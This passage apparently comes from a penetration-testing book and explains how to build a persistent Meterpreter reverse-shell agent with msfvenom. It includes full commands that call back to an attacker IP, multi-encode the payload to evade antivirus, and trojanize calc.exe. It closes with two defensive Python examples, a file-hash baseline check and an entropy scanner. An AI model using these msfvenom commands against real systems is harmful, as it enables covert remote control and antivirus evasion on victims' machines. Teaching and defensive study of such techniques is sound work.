Creating a standalone persistent agent with Metasploit

The Metasploit framework can be used to create a standalone executable that can persist on a compromised system and allow interactive communications. The advantage of a standalone package is that it can be prepared and tested in advance to ensure connectivity, and encoded to bypass local antivirus software:

  1. To make a simple standalone agent, use msfvenom. In the example shown in the following screenshot, the agent is configured to use a reverse_tcp Meterpreter payload that connects back to the attacker's IP address (lhost, 192.168.0.109 here) on port 443 (lport):
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -e x86/shikata_ga_nai -i 5 -f exe -o attack1.exe

The agent, named attack1.exe, is written as a Win32 executable (-f exe).

This encodes the attack1.exe agent five times (-i 5) with the x86/shikata_ga_nai encoder. Each additional encoding pass makes the result harder to match against a static signature; however, each pass also makes the executable larger.

We can restrict the encoder's output in msfvenom with the -b (bad characters) option, which takes a list of byte values the encoded payload must not contain, for example -b '\x00\x0a\x0d'. The following bytes should be avoided when encoding a persistent agent because they can truncate or corrupt the payload on its way to the target and so cause the attack to fail:

    • \x00: Represents a null (zero) byte
    • \x0a: Represents a line feed
    • \x0d: Represents a carriage return
  2. To create a multi-encoded payload, chain msfvenom instances so that each one encodes the raw output of the previous one:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -e x86/shikata_ga_nai -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe
  3. You can also use msfvenom to inject the payload into an existing executable, so that both the original program and the persistent agent keep working. To bind the agent to an executable such as the Windows calculator (calc.exe), first copy the appropriate calc.exe into Kali Linux. You can download it from an existing Meterpreter session by running meterpreter > download c:\windows\system32\calc.exe.
  4. When the file is downloaded, run the following command (-x names the template executable and -k keeps the template's original behaviour):
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -x /root/calc.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o calc.exe
  5. The agent can then be placed on the target system, renamed calc.exe (replacing the original calculator), and executed.
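The last step above swaps the agent in for the real calc.exe. The following Python script is an added example, not code from the book, from Metasploit or from any Windows component; it shows the defender-side check that catches such a swap: a SHA-256 baseline of system binaries is recorded beforehand and compared against the current directory tree, reporting modified, missing and new files. The directory, file names and file contents are all constructed inside a temporary folder, and the "agent" is an arbitrary byte string standing in for the msfvenom output.

```python
"""Baseline file-integrity check (constructed example, not part of the book).

Replacing a system binary with a stand-in agent changes its hash. A defender
who keeps a SHA-256 baseline of system binaries can spot the swap because
the recorded hash of calc.exe no longer matches the file on disk. Everything
here runs inside a temporary directory; nothing is read from a real host.
"""
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=65536):
    """Return the hex SHA-256 digest of a file, read in fixed-size chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(directory):
    """Map every regular file under `directory` (relative path) to its SHA-256."""
    baseline = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, directory)
            baseline[rel] = sha256_file(full)
    return baseline


def check_against_baseline(directory, baseline):
    """Compare the current tree with a stored baseline.

    Returns a dict with three sorted lists:
      modified - files present in both but with a different hash
      missing  - files in the baseline that no longer exist on disk
      new      - files on disk that the baseline never recorded
    """
    current = build_baseline(directory)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in current)
    new = sorted(p for p in current if p not in baseline)
    return {"modified": modified, "missing": missing, "new": new}


def simulate_binary_swap():
    """Constructed scenario: baseline a fake system32, then replace calc.exe.

    The replacement content is an arbitrary byte string standing in for the
    msfvenom output; no real payload is involved.
    """
    with tempfile.TemporaryDirectory() as system32:
        for name, content in (("calc.exe", b"original calculator bytes"),
                              ("notepad.exe", b"original notepad bytes")):
            with open(os.path.join(system32, name), "wb") as f:
                f.write(content)
        baseline = build_baseline(system32)

        # The step from the text: a different file is dropped in place of calc.exe.
        with open(os.path.join(system32, "calc.exe"), "wb") as f:
            f.write(b"something that is not the original calculator")

        return check_against_baseline(system32, baseline)


if __name__ == "__main__":
    # Expected: {'modified': ['calc.exe'], 'missing': [], 'new': []}
    print(simulate_binary_swap())
```

In practice the baseline would be taken from a known-good image and stored off the monitored host, and on Windows the hash comparison is complemented by checking the Authenticode signature of the file, which a re-packed binary does not carry.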

Unfortunately, nearly all Metasploit-encoded executables are detected by client antivirus software. This has been attributed to penetration testers who have submitted encoded payloads to sites such as VirusTotal (www.virustotal.com). However, you can create an executable and then encrypt it using Veil-Evasion, as described in Chapter 10, Exploitation.
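One reason multi-encoded executables are easy to flag is statistical rather than signature-based: repeated encoding drives the byte entropy of the payload region towards the 8 bits per byte of random data, well above what plain x86 code or text shows. The following Python script is an added example, not code from the book, from Metasploit or from any antivirus product; it computes Shannon entropy over fixed-size windows of a constructed buffer (a repetitive code-like region followed by the same bytes XOR-ed with a random keystream, which mimics the statistics of an encoded payload) and reports the windows that exceed a threshold. The 512-byte window and 7.0-bit threshold are assumptions chosen for this demonstration.

```python
"""Entropy heuristic for spotting encoded regions (constructed example).

Plain code and text sit well below 8 bits of entropy per byte, while
encoded or encrypted blobs approach it. Scanning a file in fixed windows
and flagging those above a threshold is a simple, signature-free way to
notice a payload that has been through several encoding passes.
"""
import math
import os
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte (0.0 .. 8.0) of a byte string."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def high_entropy_windows(data, window=512, threshold=7.0):
    """Return (offset, entropy) for each full window at or above the threshold.

    A trailing partial window is skipped so every measurement covers the
    same number of bytes. The threshold is an assumed heuristic value.
    """
    hits = []
    for off in range(0, len(data) - window + 1, window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def build_sample(code_len=1024, payload_len=1024):
    """Constructed input: a repetitive code-like region followed by the same
    kind of bytes XOR-ed with a random keystream (statistically similar to an
    encoded payload; no real payload is involved)."""
    pattern = b"\x55\x89\xe5\x83\xec\x10\x90\xc3"  # a short instruction-like pattern
    code = (pattern * (code_len // len(pattern) + 1))[:code_len]
    plain = (pattern * (payload_len // len(pattern) + 1))[:payload_len]
    key = os.urandom(payload_len)
    encoded = bytes(p ^ k for p, k in zip(plain, key))
    return code + encoded


def analyse(data, window=512):
    """Summarise which windows look encoded: (total_windows, flagged_offsets)."""
    total = len(data) // window
    flagged = [off for off, _ in high_entropy_windows(data, window)]
    return total, flagged


if __name__ == "__main__":
    sample = build_sample()
    # Expected: (4, [1024, 1536]) -- only the XOR-ed second half is flagged
    print(analyse(sample))
```

The heuristic is deliberately coarse: legitimately compressed resources and signed installers also show high entropy, so in a real scanner the windows flagged here would be one signal weighed alongside others (section names, import table, packer stubs) rather than a verdict on their own.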
